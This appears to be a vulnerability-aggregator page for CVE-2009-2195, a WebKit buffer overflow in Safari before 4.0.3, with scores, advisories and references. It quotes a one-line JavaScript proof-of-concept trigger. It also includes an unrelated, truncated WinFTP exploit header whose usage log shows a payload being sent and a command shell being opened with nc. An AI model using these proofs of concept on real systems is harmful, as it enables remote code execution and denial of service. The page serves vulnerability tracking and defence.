CVE-2009-2195
published 2009-08-12CVE-2009-2195: Buffer overflow in WebKit in Apple Safari before 4.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via…
PriorityP352critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
13.29%
95.9th percentile
Buffer overflow in WebKit in Apple Safari before 4.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted floating-point numbers.
Affected
60 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | safari | <= 4.0.2 | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_redhat9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
WebKit: buffer overflow in floating point numbers parsing
vendor_redhat·2009-08-11·CVSS 9.3
CVE-2009-2195 [CRITICAL] WebKit: buffer overflow in floating point numbers parsing
WebKit: buffer overflow in floating point numbers parsing
Buffer overflow in WebKit in Apple Safari before 4.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted floating-point numbers.
GHSA
GHSA-g9rg-m48v-pqpf: Buffer overflow in WebKit in Apple Safari before 4
ghsa_unreviewed·2022-05-02
CVE-2009-2195 [HIGH] CWE-119 GHSA-g9rg-m48v-pqpf: Buffer overflow in WebKit in Apple Safari before 4
Buffer overflow in WebKit in Apple Safari before 4.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted floating-point numbers.
No detection rules found.
Exploit-DB
WebKit - Floating Point Number Remote Buffer Overflow
exploitdb·2009-08-11
CVE-2009-2195 WebKit - Floating Point Number Remote Buffer Overflow
WebKit - Floating Point Number Remote Buffer Overflow
---
source: https://www.securityfocus.com/bid/36023/info
WebKit is prone to a remote buffer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.
Versions prior to Apple Safari 4.0.3 are vulnerable; other applications using WebKit may also be affected.
Example 1:
var Overflow = "31337" + 0.313373133731337313373133731337...;
Example 2:
Exploit-DB
WinFTP Server 2.3.0 - 'LIST' (Authenticated) Remote Buffer Overflow
exploitdb·2009-01-26
CVE-2009-0351 WinFTP Server 2.3.0 - 'LIST' (Authenticated) Remote Buffer Overflow
WinFTP Server 2.3.0 - 'LIST' (Authenticated) Remote Buffer Overflow
---
#!/usr/bin/perl
#
# WinFTP 2.3.0 post-auth remote exploit. (www.wftpserver.com)
#
################################################################################
# #
# root@halcyon:~/Exploits/WinFTP# perl winftp-remote.pl #
# #
# Usage: winftp-remote.pl #
# #
# Target: 1 -> Win2k #
# Target: 2 -> WinXP sp2/3 (DoS only) #
# #
# root@halcyon:~/Exploits/WinFTP# perl winftp-remote.pl 10.0.0.5 user1 pass1 1 #
# #
# [=] Connected. #
# [=] Sending user user1 #
# [=] Sending pass pass1 #
# [=] Sending payload... #
# [=] Done. You should have a command shell on port 7777. #
# #
# root@halcyon:~/Exploits/WinFTP# nc 10.0.0.5 7777 #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-1999 Microsoft Corp. #
# #
#
http://lists.apple.com/archives/security-announce/2009/Aug/msg00002.htmlhttp://lists.apple.com/archives/security-announce/2010/Jun/msg00003.htmlhttp://lists.opensuse.org/opensuse-security-announce/2011-01/msg00006.htmlhttp://secunia.com/advisories/43068http://support.apple.com/kb/HT3733http://support.apple.com/kb/HT4225http://www.securityfocus.com/bid/36023http://www.securitytracker.com/id?1022717http://www.vupen.com/english/advisories/2011/0212http://lists.apple.com/archives/security-announce/2009/Aug/msg00002.htmlhttp://lists.apple.com/archives/security-announce/2010/Jun/msg00003.htmlhttp://lists.opensuse.org/opensuse-security-announce/2011-01/msg00006.htmlhttp://secunia.com/advisories/43068http://support.apple.com/kb/HT3733http://support.apple.com/kb/HT4225http://www.securityfocus.com/bid/36023http://www.securitytracker.com/id?1022717http://www.vupen.com/english/advisories/2011/0212
2009-08-12
Published